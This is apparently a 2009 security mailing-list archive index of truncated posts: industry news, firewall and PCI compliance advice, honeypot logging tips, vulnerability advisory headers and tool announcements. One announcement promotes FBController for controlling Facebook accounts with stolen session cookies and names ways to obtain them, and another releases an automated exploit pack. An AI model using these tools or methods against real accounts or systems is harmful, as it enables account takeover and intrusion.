Re: Malware Analysis Chip Panarchy (Nov 23)
Hi,

Not sure what happened to my last post, so I'll just reiterate it!

Of many anti-malware software I've tried, MalwareBytes (free) seems to
be the best.

However, I haven't tested the latest ones, so I'd recommend (if you
have the time) to test out as many of the different free/trial malware
detection/removal software as you can, then decide for yourself.

Best of luck,

Panarchy...

Re: CEH or OSCP? Wim Remes (Nov 23)
Hi,

There's really only one good answer to this : OSCP.

If you still want to be in security after that, you're good .... be prepared for a wild ride though, you'll be out
there on your own. It's not a course for the faint of heart.

I'm not gonna comment on CEH ...

Cheers,

W

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and...

Re: Firewall Type Fingerprinting Edin Dizdarevic (Nov 23)
Nmap should be the right tool, it can recognize many target systems. Get
it at http://nmap.org, see the docs for more information.

Regards,
Edin

Zaki Akhmad schrieb:

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT
and CEPT...

Info Security News — Carries news items (generally from mainstream sources) that relate to security.

Surprise "Housewives" dinner guests not invited, White House says InfoSec News (Nov 26)
http://voices.washingtonpost.com/reliable-source/2009/11/salahi_photos_etc.html

By The Reliable Source
The Washington Post
November 25, 2009

A couple of aspiring reality-TV stars from Northern Virginia appear to
have crashed the White House's state dinner Tuesday night, penetrating
layers of security with no invitation to mingle with the likes of Vice
President Biden and White House Chief of Staff Rahm Emanuel.

Tareq and Michaele Salahi --...

HITB Security Conference 2010 Dubai Call for Papers InfoSec News (Nov 26)
The Call for Papers for HITB Security Conference 2010 Dubai is now open!

Talks that are more technical or that discuss new and never before seen
attack methods are of more interest than a subject that has been covered
several times before. Summaries not exceeding 1250 words should be
submitted (in plain text format) to cfp -at- hackinthebox.org for review
and possible inclusion in the programme.

Date: April 19th . 22nd 2010
Venue: Sheraton...

Man guilty of selling fake chips to US Navy InfoSec News (Nov 26)
http://www.channelregister.co.uk/2009/11/25/us_navy_fake_chips/

By John Oates
The Register
25th November 2009

A 32-year-old California man has pleaded guilty to selling thousands of
counterfeit computer processors to the US Navy.

Neil Felahy of Newport Coast, California pleaded guilty to conspiracy
and trafficking in counterfeit goods charges. As part of a plea bargain
Felahy has agreed to co-operate with the US authorities.

He faces a...

Metasploit releases IE attack, but it's unreliable InfoSec News (Nov 26)
http://www.computerworld.com/s/article/9141485/Metasploit_releases_IE_attack_but_it_s_unreliable?taxonomyId=17

By Robert McMillan
IDG News Service
November 25, 2009

Developers of the open-source Metasploit penetration testing toolkit
have released code that can compromise Microsoft's Internet Explorer
browser, but the software is not as reliable as first thought.

The code exploits an Internet Explorer bug that was disclosed last
Friday in a...

Security Is Chief Obstacle To Cloud Computing Adoption, Study Says InfoSec News (Nov 26)
http://www.darkreading.com/securityservices/security/perimeter/showArticle.jhtml?articleID=221901195

By Tim Wilson
DarkReading
Nov 25, 2009

Nearly half of organizations say they have no plans to use any cloud
computing technologies in the next year -- and security concerns are the
chief reason why.

That's the conclusion of a survey that will be published next month by
Launchpad Europe, a company that helps emerging firms with global...

NIST Director Sees Key Role In Emerging Technologies InfoSec News (Nov 26)
http://www.informationweek.com/news/government/policy/showArticle.jhtml?articleID=221901183

By J. Nicholas Hoover
InformationWeek
November 25, 2009

As it takes on research and standardization in the areas of healthcare
IT, smart grid, and cybersecurity, the National Institute of Standards
and technology has a "critically important" role to play, according to
NIST's new director, Patrick Gallagher.

A 16-year NIST veteran and former...

Cyber breaches kept secret InfoSec News (Nov 26)
Forwarded from: Simon Taplin <simon.taplin (at) gmail.com>

http://www.itweb.co.za/index.php?option=com_content&view=article&id=28347:cyber-breaches-kept-secret&catid=219:reuters

By Reuters
25 Nov 2009

Cybercriminals regularly breach computer security systems, stealing
millions of dollars and credit card numbers in cases that companies keep
secret, said the FBI's top Internet crimes investigator.

For every break-in like the...

Microsoft warns of IE exploit code in the wild InfoSec News (Nov 24)
http://news.cnet.com/8301-27080_3-10403756-245.html

By Elinor Mills
InSecurity Complex
CNet News
November 23, 2009

Microsoft on Monday said it is investigating a possible vulnerability in
Internet Explorer after exploit code that allegedly can be used to take
control of computers, if they visit a Web site hosting the code, was
posted to a security mailing list.

Microsoft confirmed that the exploit code affects IE 6 and IE 7, but not
IE 8,...

Inside the Ring - Chinese, Russian cyberwarfare InfoSec News (Nov 24)
http://www.washingtontimes.com/news/2009/nov/19/inside-the-ring-37209361/

By Bill Gertz
INSIDE THE RING
November 19, 2009

[...]

Chinese, Russian cyberwarfare

The Pentagon's National Defense University recently published a
groundbreaking book that is one of the few U.S. government documents to
highlight the cyberwarfare capabilities of both China and Russia.

The book "Cyberpower and National Security" contains a chapter on the...

Symantec Japan website bamboozled by hacker InfoSec News (Nov 24)
http://www.theregister.co.uk/2009/11/23/symantec_website_security_snafu/

By John Leyden
The Register
23rd November 2009

A Symantec-run website was vulnerable to Blind SQL Injection problems
that reportedly exposes a wealth of potentially sensitive information.

Romanian hacker Unu used off-the-shelf tools (Pangolin and sqlmap) to
steal a glimpse at the database behind Symantec's Japanese website. A
peek at the Symantec store revealed by the...

NIST Drafts Cybersecurity Guidance InfoSec News (Nov 24)
http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=221900722

By J. Nicholas Hoover
InformationWeek
November 23, 2009

Draft guidance from the National Institute of Standards and Technology
issued last week, pushes government agencies to adopt a comprehensive,
continuous approach to cybersecurity, tackling criticism that federal
cybersecurity regulations have placed too much weight on periodic
compliance...

Hancock Fabrics Linked to Fraud in 3 States InfoSec News (Nov 24)
http://www.bankinfosecurity.com/articles.php?art_id=1961

By Linda McGlasson
Managing Editor
Bank Info Security
November 23, 2009

Bank customers in California, Wisconsin and Missouri are reporting
fraudulent ATM withdrawals that police say are tied to transactions
conducted with the Hancock Fabrics retail chain.

In California, Napa Police Department spokesman Brian McGovern says 60
residents reported their cards being used by thieves. In one...

Recent Air Force Law Review discusses Cyberlaw InfoSec News (Nov 22)
http://www.maxwell.af.mil/news/story.asp?id=123178704

By Carl Bergquist
Air University Public Affairs
11/20/2009

MAXWELL AIR FORCE BASE, Ala. -- Volume 64 of the Air Force Law Review is
now available in hardcopy and online. Published this year, it is
sub-titled the "Cyberlaw Edition."

Largely the result of a symposium held at the Judge Advocate General
School at Maxwell Air Force Base, the edition addresses many of the
issues...

Three Indicted For Comcast Site Hack InfoSec News (Nov 22)
http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=221900520

By Tim Wilson
DarkReading
Nov 20, 2009

Three alleged hackers this week were indicted for a 2008 attack that
redirected traffic from the Comcast Website to a prank page.

Christopher Allen Lewis, 19, and James Robert Black Jr., 20, are accused
of being the hackers "EBK" and "Defiant," who hijacked the Comcast
domain in May of last year,...

Hackers steal electronic data from top climate research center InfoSec News (Nov 22)
http://www.washingtonpost.com/wp-dyn/content/article/2009/11/20/AR2009112004093.html

By Juliet Eilperin
Washington Post Staff Writer
November 21, 2009

Hackers broke into the electronic files of one of the world's foremost
climate research centers this week and posted an array of e-mails in
which prominent scientists engaged in a blunt discussion of global
warming research and disparaged climate-change skeptics.

The skeptics have seized upon...

Firewall Wizards — Tips and tricks for firewall administrators

Re: Using linux firewalls for PCI compliant infrastructure Skip Carter (Nov 25)
You could have your cake and eat it too by purchasing a shrink-wrap
Linux firewall. I have a client that had a regulatory requirement
to use an ICSA certified firewall and was able to satisfy that
requirement with one of those commercial Linux firewalls.

Re: Using linux firewalls for PCI compliant infrastructure Marcin Antkiewicz (Nov 25)
It's not cargo cult or, at least, it does not have to be. Commercial solutions
are normalized, or at least appear as such to the general population, such as
your auditors. From your perspective it might, rightfully, seem like a misplaced
effort, while the security folks could report to many masters and have another
set of requirements (cost of compliance vs. your more technical metrics).

Before I get shot: I am not arguing that the audit score...

Re: Using linux firewalls for PCI compliant infrastructure Victor Williams (Nov 25)
I generally believe that is due to lack of knowledge. If the knowledge of
the solution rests in you alone, and you quit, get hit by a truck, get swine
flu and are out of commission, etc, then they have no one to go back and get
support from other than you and whatever they can find on the iptables
website or some other Google search. Most management want a very defined
support structure in place.

I am in the weird position of being a...

Re: Using linux firewalls for PCI compliant infrastructure Siim Põder (Nov 25)
Hi

Tracy Reed wrote:

IMO, mostly the latter (the cargo cult one):
1) Commercial vendors are sometimes certified to be secure
2) Lot's of people are using commercial firewalls for critical
infrastructure and hence they are better tested
3) Commercial vendor can be pushed to produce patches for problems

We currently have iptables on central firewalls and mod_security doing
application level filtering on webservers themselves. It was suggested...

Re: Using linux firewalls for PCI compliant infrastructure Tracy Reed (Nov 24)
On Wed, Nov 25, 2009 at 12:37:07AM +0200, Siim Põder spake thusly:

I am. For PCI. No problem. Did the people who suggested something
commercial provide any good quantifiable reasons or was it simply
cargo-cult network security?

Re: Using linux firewalls for PCI compliant infrastructure Paul D. Robertson (Nov 24)
Have them articulate *why* they think it would be better-suited in terms
of the DSS standard. Have them articulate what security features they
think are missing in your current infrastructure, then you can make an
informed analysis of how to implement those features (be it with Linux or
what have you.) The term "commercial firewall" still probably encompasses
over a hundred devices from I dunno- more than fifty vendors- so how...

Using linux firewalls for PCI compliant infrastructure Siim Põder (Nov 24)
Hi

We are using linux-based servers as firewalls for PCI compliant
infrastructure. During audits it has been OK so far but security
people internally have suggested that maybe a commercial product would
be better suited for PCI infrastructure (as it is pretty critical).

I'm personally very happy with the iptables firewalls - we can use all
the standard components for firewalls that we use for everything else
(including standard administration...

Re: Message Labs A (Nov 17)
Yeah, its if you are using their mail-filtering service, for them to
be able to send you mail you have to allow the ip ranges.

Most people will lock down the router to only accept email from the
hosted security provider.. to reduce spam.

Aaron

\ /
Putting the F in BOFH!

2009/11/11 Brian Loe <knobdy () gmail com>:

Re: port scanning activity going up recently? Nate Itkin (Nov 17)
Overall illicit activity looks to be down slightly.
see: http://www.dshield.org/submissions.html (select sources, targets,
and reports for 2009)

Cheers,
Nate Itkin

Re: Message Labs shane brennan (Nov 17)
Hi

We use it in work. havent received any notification like that

Shane

Re: Network design change sai (Nov 15)
not good from a security point of view.

I would prefer to connect the routers, at the internet cloud level not the
DMZ level. I'd have the 2 core switches connected as you have.

2 reasons:
[1] gives me redundant internet connectivity in case one of the isps goes
down (assuming multiple isps and routing that can handle one link going
down)
[2] the DMZs should be separate. the more segments you have the better.
connecting the 2 at switch level...

Re: Network design change pkc_mls (Nov 15)
shadow floating a écrit :

If it's possible, I'd rather use a link between both firewalls
to connect the DMZ.

If you connect directly the dmz switches, and if someone can get access
to your dmz, he will get access to the other one as well, as there won't
be any filtering between the DMZs.

do the DMZ share the same network addresses ?

if not, just use an unused interface on each fw, connect both via a
link, then create some routes to allow...

Re: secure firewall rule management program Lan Li (Nov 15)
Athena Security also provides a cleanup tool/basic ops tool. Works with
Cisco, Check Point and Netscreen firewalls. Available for eval download at
http://www.athenasecurity.net/firepac_trial.html

Lan Li

-----Original Message-----

From: firewall-wizards-bounces () listserv icsalabs com

[mailto:firewall-wizards-bounces () listserv icsalabs com] On Behalf Of Marcin
Antkiewicz

Sent: Thursday, November 05, 2009 10:52 PM

To: Firewall Wizards...

Re: OT, sorta: Breaking pipes? Kurt Buff (Nov 15)
We don't use perl/cgi here, but the example is instructive.

This issue at hand is for web browsing by clients - the newish manager
believes that it's just too annoying to add exceptions for the
misbehaving web sites. Of course, it's not just the pipe character.
It's also the other unsafe/unwise characters, and the URLs that are
longer than 1024 characters, etc.

At some point we may be hosting a web site locally, but that hasn't happened.

This...

Message Labs Brian Loe (Nov 15)
Anyone here using message labs? Have you received notice that you MUST
open up your firewall for 8 or so networks?

IDS Focus — Technical discussion about Intrusion Detection Systems. You can also read the archives of a previous IDS list

Replicating the Gonzalez Cyber Attacks through Penetration Testing Core Security (Nov 20)
--------------------------------------------------------------------------------
YOU'RE INVITED: IT SECURITY ON DEMAND WEBCAST

"Replicating the Gonzalez Cyber Attacks through Penetration Testing"
Register: http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez
---------------------------------------------------------------------------------

Recently, we saw the indictment of cybercrime kingpin Albert Gonzalez, one...

CfP EWNI2010: 1st European Workshop on Internet Early Warning and Network Intelligence Till Dörges (Nov 12)
Hi all,

attached the CfP for the 1st European Workshop on Internet Early Warning and Network
Intelligence. If you have any questions please don't hesitate to contact me.

Regards -- Till

Re: Re: PCI DSS 11.1 - ".. deploying a wireless IDS/IPS..". Kismet+Snort? Ray (Nov 02)
Although this also does not meet the PCI requirement, one thing you can do
to rapidly detect transient wireless access points is this:

1. Make sure your network default route leads to your firewall.
2. Monitor the firewall for internal devices trying to do NTP (time sync)
lookups.

This presumes you have an internal time server system and you have properly
configured your internal systems to not go to the Internet for time.

It works because...

Re: Re: PCI DSS 11.1 - ".. deploying a wireless IDS/IPS..". Kismet+Snort? brian_klumpp (Oct 30)
I realize this thread is a little old, but I did want to make a comment in regards to this. As a QSA, *wired* side
scanning alone would be insufficient to meet the intent of the PCI DSS 11.1 requirement. There is this quote from PCI
Council:

"Relying on wired side scanning tools (e.g. tools that scan suspicious hardware MAC addresses on switches) may identify
some unauthorized wireless devices; however, they tend to have high false...

Announcing pcapr Trends kowsik (Oct 01)
With the recent influx of pcaps, the number of protocols and pcaps are
getting to the point where interesting trend analysis makes sense. So
we set out to find the meaning of it all with multi-dimensional data
visualization using Motion Charts.

We wanted to find out
- How does the coverage and #pcaps for a given protocol trend over time?
- When was a protocol first introduced into pcapr?
- What is 42 and what does it have to do with packet...

Web App Security — Provides insights on the unique challenges which make web applications notoriously hard to secure, as well as attack methods including SQL injection, cross-site scripting (XSS), cross-site request forgery, and more.

Re: out of box scanner Jon Kibler (Nov 26)
John Bennett wrote:

Do a fly-off in your environment. Each will give you 15-day demos. Run the demos
concurrently so that you can compare and contrast results. If a scanner vastly
under-preforms one of the competitors, contact their tech reps because you most
likely have something misconfigured.

Pick the scanner that finds the most non-false positives that the other scanners
miss, has the least false negatives, best fits your working...

out of box scanner John Bennett (Nov 25)
I'm currently evaluating some commercial scanners and wanted to get a
feel for others experiences with appscan/cenzic/webinspect. Any
gotcha's with any of these products and can anybody recommend one over
the other?

thanks,
John

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!...

Replicating the Gonzalez Cyber Attacks through Penetration Testing Core Security (Nov 20)
--------------------------------------------------------------------------------
YOU'RE INVITED: IT SECURITY ON DEMAND WEBCAST

"Replicating the Gonzalez Cyber Attacks through Penetration Testing"
Register: http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez
---------------------------------------------------------------------------------

Recently, we saw the indictment of cybercrime kingpin Albert Gonzalez, one...

winAUTOPWN 2.0 - Introducing winAUTOPWN GUI - Now you can sleep QUAKER DOOMER (Nov 03)
Dear all,

After a long break and a lot of Unpolished SITA releases of the previous version,
I am finally releasing winAUTOPWN version 2.0

winAUTOPWN or WINDOWS AUTOPWN version 2.0 now has a GUI (winAUTOPWN_GUI.exe) to initiate the main
console winAUTOPWN.exe
winAUTOPWN now supports all console arguments which can also be fed interactively.
This version covers almost all remote exploits from 2009 start uptill October 2009. Though a few are...

[AntiSnatchOr] Eclipse BIRT <= 2.2.1 Reflected XSS Michele Orru (Oct 16)
Eclipse BIRT <= 2.2.1 Reflected XSS

Vendor: Eclipse
Advisory: http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/
Author: Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com)

Quite a common problem in a lot of Java based applications: reflected
XSS in Java stack trace.

A Reflected XSS is present in the _report parameter: here below the modified
request (that is the BIRT 2.2.1 version included in Konakart...

Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities Andrea Fabrizi (Oct 16)
**************************************************************
Application: Snitz Forums 2000
Version affected: 3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************

###### PERMANENT XSS
If [sound] tag is allowed:

[sound]...

[BONSAI] XSS in Achievo - Customized XSS payload included Bonsai - Information Security (Oct 16)
Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/

Multiple XSS in Achievo

1. *Advisory Information*

Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release

2. *Vulnerability Information*...

WASC Announcement: 2008 Web Application Security Statistics Published announcements (Oct 16)
The Web Application Security Consortium (WASC) is pleased to announce
the WASC Web Application Security Statistics Project 2008. This
initiative is a collaborative industry wide effort to pool together
sanitized website vulnerability data and to gain a better understanding
about the web application vulnerability landscape.

The statistics was compiled from web application security assessment
projects which were made by the following companies in...

[AntiSnatchOr] Pentaho Bi-server multiple vulnerabilities Michele Orru (Oct 16)
Pentaho 1.7.0.1062 Multiple Vulnerabilities

Name Multiple Vulnerabilities in Pentaho
Systems Affected Pentaho <= 1.7.0.1062
Severity High
Impact (CVSSv2) High 7/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
Vendor http://www.pentaho.com
Advisory http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/
Authors Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com)

Date 20081224

I. BACKGROUND...

[BONSAI] SQL Injection in Achievo Bonsai - Information Security (Oct 16)
Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/

SQL Injection in Achievo

1. *Advisory Information*

Title: SQL Injection in Achievo
Advisory ID: BONSAI-2009-0102
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-sql-injection-0102.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release

2. *Vulnerability Information*...

WASC Announcement: Announcing the Web Application Security Scanner Evaluation Criteria v1 announcements (Oct 08)
The Web Application Security Consortium is pleased to announce the release
of version 1 of the Web Application Security Scanner Evaluation Criteria
(WASSEC). The goal of the WASSEC project is to create a vendor-neutral
document to help guide information security professionals during web
application scanner evaluations. The document provides a comprehensive list
of features that should be considered when conducting an evaluation. The
WASSEC...

FBController - (Facebook Control Utility) version 2.0 QUAKER DOOMER (Sep 15)
FBController - The Ultimate Utility to Control Facebook accounts without the
Password.

Let me clear this again like last time that this utility WON'T hack/crack Facebook accounts.
The utility will need biscuits/cookies instead of the password.

Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing,
scroogle search, anyhow !
Once you have the cookies you can use FBController and have Full control over the
target's...

Re: How to enable LDAP signing on client side Peter M. Jansson (Sep 15)
The goal of having the server sign LDAP results would be to give
confidence in the integrity if the answers. I don't understand what
the goal of having clients sign queries would be. If you use SSL, the
client-server exchange is kept confidential (subject to some
assumptions) and client-side certificates can be used by the server to
provide access control so rogue clients can't make requests.

How to enable LDAP signing on client side Jianrong Yu (Sep 15)
Hi All,

The link <http://support.microsoft.com/kb/935834> is the step the How to
enable LDAP signing in Windows Server 2008.

How to enable LDAP signing on client side?

Thanks,

Jianrong Yu
Systems Operation
Office of Information technology
Ohio University

nullcon Goa 2010 Call For Papers nullcon nullcon (Sep 13)
Calling all greyhats, whitehats, blackhats, rainbowhats, nohats,
underground, aboveground, in-the-sky, on-the-moon, Grannies,
Grandpas, martians, Doodhwalas, Kaamwalis, Bai, Bhai, Chuck norris Fans,
Mithun Da Fans, Himesh Reshamiya wannabees……..

Call For Paper is officially open for nullcon Goa 2010. It is time for
you to polish your paper, stick up an abstract and send it across.
A live demo/exploit/0day with the presentation might win you...

Daily Dave — This technical discussion list covers vulnerability research, exploit development, and security events/gossip. It was started by ImmunitySec founder Dave Aitel and many security luminaries participate. Many posts simply advertise Immunity products, but you can't really fault Dave for being self-promotional on a list named DailyDave.

Re: English Shellcode Bob Auger (Nov 24)
Darrin Barall spoke about this exact thing at blackhat in 2005.

http://www.blackhat.com/html/bh-usa-05/bh-usa-05-speakers.html (grep
Shakespearean Shellcode)
http://media.blackhat.com/bh-usa-05/audio/2005_BlackHat_Vegas-V31-D_Barrall-Shakespearean_Shellcode.mp3
http://mirror.fpux.com/HackerCons/Blackhat%202005/CD/BH_US_05_BARRALL.PDF

English Shellcode dave (Nov 24)
This hit Slashdot recently, and it's interesting.

http://www.cs.jhu.edu/~sam/ccs243-mason.pdf

One thing people always try to avoid mentioning in papers about
shellcode is size. But in this case, they say that a exit(0) Linux
shellcode is going to be 2K or so which is good to know. There's the
obligatory "our shellcode is too powerful to include a complete example
of!" which is pretty funny. Developing these sorts of techniques to...

Re: Fedora 12 Fail Kees Cook (Nov 19)
I've seen variations on this sentence get repeated in a few places and I
think it's valuable to point out it should read as "Any _local_ user..."
(where "local" is defined by console-kit[1] -- see "ck-list-sessions"
command). This makes it a smaller scope of problem, but it should not
discourage anyone from reading the bug report anyway:
https://bugzilla.redhat.com/show_bug.cgi?id=534047

-Kees

[1]...

Re: Fedora 12 Fail dan (Nov 19)
Michael Graham writes:
-+--------------------
| "I don't particularly care how UNIX has always worked." has already
| turned into a new catchphrase around here.
|

Those who do not understand UNIX are condemned to reinvent it, poorly.

-- Henry Spencer, 1987

Re: Fedora 12 Fail Michael Graham (Nov 18)
"I don't particularly care how UNIX has always worked." has already
turned into a new catchphrase around here.

Fedora 12 Fail Dave Aitel (Nov 18)
Probably the best Linux thread in months:
https://www.redhat.com/archives/fedora-devel-list/2009-November/msg00945.html

To sum it up, Fedora 12 is defaulting to "Any user can install any
package from the repo and then exploit it to get root". So like, if
the repo signs something hilarious like "bob's vulnerable FTP
server.rpm", every Fedora 12 server is vulnerable. Unless you've
uninstalled PolicyKit or something else...

Re: "We're in the top of the league." Nate Lawson (Nov 13)
gold flake wrote:

The government is just a very large company. They experience the same
security problems as other big companies. I'm always annoyed to hear the
"we're under cyber attack via cyber warfare using cyber malware".

Please... you're under attack just like any other big company with
extremely valuable assets. You're not any more special than that. It's
possible the IRS is more valuable a target than Joe Random sergeant's PC.

Re: "We're in the top of the league." gold flake (Nov 12)
I am not from US and was for almost 10 years part of my government's
cyber security setup. I can vouch for the claims regarding "some
foreign power"'s attacks. These are systematic, planned and
relentless attacks that we also faced. The vector was spear phishing
in most cases and the thumb drive method was used to propagate the
malware to the internal segment. The malware called home (mostly
China) and downloaded backdoors,...

Re: "We're in the top of the league." Richard Bejtlich (Nov 12)
Aaron and everyone,

If anyone has doubts, or just wants to read some excellent
unclassified reporting on advanced persistent threat, please check out
this report by Northrop Grumman:

http://taosecurity.blogspot.com/2009/10/report-on-chinese-government-sponsored.html

Sincerely,

Richard

Re: "We're in the top of the league." Dobbins, Roland (Nov 09)
Here's a pretty accurate assessment of the 60 Minutes story, IMHO:

<http://erratasec.blogspot.com/2009/11/brazil-outage-not-caused-by-hackers.html
>

-----------------------------------------------------------------------
Roland Dobbins <rdobbins () arbor net> // <http://www.arbornetworks.com>

Injustice is relatively easy to bear; what stings is justice.

-- H.L. Mencken

a brief interlude between exploits dave (Nov 09)
There's been a lot happening in the world, and usually everyone is too
busy to comment on it. Exploit devs sometimes think of the world as the
dark troughs in a storm ocean, where the peaks are the sudden insights
of truth provided by a really good exploit, where all of a sudden you
can see for miles. Or maybe I just made all that up. In any case:

CBS says that someone turned off Brazilian power using cyber attack:...

"We're in the top of the league." Aaron (Nov 09)
Anyone else catch the 60-minutes story about Cyber warfare? There are a lot of interesting anecdotes from Admiral Mike
McConnell (described in the story as the former top spy of the nation), Jim Lewis (director of the Center for Strategic
and International Studies), and Jim Gosler.

Some of the more WTF things admitted were:
- "Some foreign power" was able to penetrate the Pentagon by leaving infected thumbnail drives where military...

MITM Attack on Smartphones whitepaper Mayank Aggarwal (Nov 05)
SMobile has released a detailed report on research indicating that smartphone users are just as susceptible to
man-in-the-middle (MITM) attacks as PC users. This report details the results of attempts to produce MITM attacks to
determine whether it is possible to intercept SSL encrypted communications between various smartphone devices and
servers. Of the devices that were tested, each of the major smartphone operating systems appeared to lack...

Re: PrevX and other projects Shane Macaulay (Oct 30)
The chart on their main page would be a lot more compelling if they had
conversely applied whatever method they used to collect that information.

""""These statistics are provided to show that all vendors miss threats
and cannot be interpreted to compare the effectiveness of one product to
another."""""

That seems to indicate they would show us their failure rate when
compared to these vendors? And...

PrevX and other projects dave (Oct 28)
So you can read one Immunity deliverable linked here:
http://www.prevx.com/ (look for "Independent Review").

Likewise, if you have wondered where all the Immunity Debugger scripts
ran off to, they were on the old Immunity Forum. We ripped the old forum
content out of the old database and imported into the new hotness, so
you can seem them all here:
https://forum.immunityinc.com/. I don't think Google spiders HTTPS sites
for some reason...

Honeypots — Discussions about tracking attackers by setting up decoy honeypots or entire honeynet networks.

nullcon Goa 2010 Call For Papers nullcon nullcon (Sep 27)
Calling all greyhats, whitehats, blackhats, rainbowhats, nohats,
underground, aboveground, in-the-sky, on-the-moon, Grannies, Grandpas,
martians, Doodhwalas, Kaamwalis, Bais, Bhais, Chuck norris Fans,
Mithun Da Fans, Himesh Reshamiya wannabees……..

Call For Paper is officially open for nullcon Goa 2010. It is time for
you to polish your paper, stick up an abstract and send it across. A
live demo/exploit/0day with the presentation might win...

Sebek issues with windows XP/Vista dharm (Sep 24)
Hello ,
Did anybody tried running sebek on windows vista as a
honeypot ? i am trying to install sebek on windows XP /Vista
environment and getting DOB screen error. Any ideas would be
appreciated .
Thanks

Workshop on the Analysis of System Logs - Oct 14 - Call for Participation Greg Bronevetsky (Sep 01)
Workshop on the Analysis of System Logs (WASL) 2009
http://www.systemloganalysis.com
Call for Participation

===============================
October 14, 2009
Big Sky, MT
(at SOSP)
===============================

--------------------------------------------------------------------------

System...

Re: Send strace output through syslog-ng BB () umd (Aug 05)
Well I did not think about this, but it seems to be a great idea. Thanks a
lot.

However, I decided to open a new port and to send syslog data through it so
that it is really easy to administrate. It works great.

Thanks for your help,

Regards,

BB () umd wrote:

Re: Send strace output through syslog-ng Gergely Révay (Aug 05)
Hi,

First of all there is no filter for strace. My first idea for your
problem was to open a new port on the server just for strace, but it's
understandable if you don't want to do it. Also the idea of Chris
sounds good as well if you don't use the facility field generally. But
a third solution that I've found is the following:

You should create a separate log path for the strace output which
should read the logs from the file and replace the...

Re: Send strace output through syslog-ng Chris Brenton (Aug 04)
Hey man,

What about something like:
tail -f /var/log/strace.log | logger -p <facility> &

In the above command you need to specify an unused facility. Then on the
server simply tell syslog-ng which file it should use for storing log
entries with the above specified facility (this can be a new unique
file).

You are suppose to use one of the "local use" facilities for stuff like
this, but I run into conflicts far too often....

Send strace output through syslog-ng BB () umd (Aug 04)
Good afternoon.

I have a honeypot which syslog-ng running. I configured it so that it can
send all the log files to a remote web server. (So that mean I have already
configured syslog-ng on this web server too) No matter with that, it works
great.

Then, on my honeypot, I have a strace command attached to my ssh server. It
gathers strace outputs in a strace.log file. Here is this command :
strace -f -q -p `cat /var/run/sshd.pid` -o...

Running Honeyd on interface IP Evgeniy Arbatov (Jul 22)
Hello,

I have a question concerning the configuration of Honeyd IP address.

I want to make my honeypot visible by the IP address of host computer interface.
I have the following setup, within the same physical host:

1.1.1.1 (interface IP)-> 2.2.2.2 (honeyd IP)

So if I ssh to the honeyd, I want to ssh to 1.1.1.1.

I guess this is something that can be done with iptables, for example like this:

iptables -A FORWARD -s 1.1.1.1 -p tcp --dport...

Extended deadline: Monday, July 6th. Workshop on the Analysis of System Logs (WASL) 2009 Greg Bronevetsky (Jul 01)
Due to multiple requests, the paper submission deadline for the Workshop
on the
Analysis of System Logs has been moved to Monday, July 6th.

Workshop on the Analysis of System Logs (WASL) 2009
http://www.systemloganalysis.com Call for Papers

===============================
October 14, 2009
Big Sky, MT
(at SOSP)...

MS Sec Notification — Beware that MS often uses these security bulletins as marketing propaganda to downplay serious vulnerabilities in their products -- note how most have a prominent and often-misleading "mitigating factors" section.

Microsoft Security Bulletin Major Revisions Microsoft (Nov 24)
********************************************************************
Title: Microsoft Security Bulletin Major Revisions
Issued: November 24, 2009
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS08-076 - Important

Bulletin Information:
=====================

* MS08-076 - Important...

Microsoft Security Bulletin Major Revisions Microsoft (Nov 10)
********************************************************************
Title: Microsoft Security Bulletin Major Revisions
Issued: November 10, 2009
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS09-051 - Critical
* MS09-045 - Critical

Bulletin Information:
=====================

*...

Microsoft Security Bulletin Summary for November 2009 Microsoft (Nov 10)
********************************************************************
Microsoft Security Bulletin Summary for November 2009
Issued: November 10, 2009
********************************************************************

This bulletin summary lists security bulletins released for
November 2009.

The full version of the Microsoft Security Bulletin Summary for
November 2009 can be found at...

Microsoft Security Bulletin Advance Notification for November 2009 Microsoft (Nov 05)
********************************************************************
Microsoft Security Bulletin Advance Notification for November 2009
Issued: November 5, 2009
********************************************************************

This is an advance notification of security bulletins that
Microsoft is intending to release on November 10, 2009.

The full version of the Microsoft Security Bulletin Advance
Notification for November 2009 can be found...

Microsoft Security Bulletin Major Revisions Microsoft (Nov 03)
********************************************************************
Title: Microsoft Security Bulletin Major Revisions
Issued: November 2, 2009
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS09-054 - Critical

Bulletin Information:
=====================

* MS09-054 - Critical

-...

Microsoft Security Bulletin Major Revisions Microsoft (Oct 28)
********************************************************************
Title: Microsoft Security Bulletin Major Revisions
Issued: October 28, 2009
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS09-062 - Critical

Bulletin Information:
=====================

* MS09-062 - Critical

-...

Microsoft Security Bulletin Major Revisions Microsoft (Oct 27)
********************************************************************
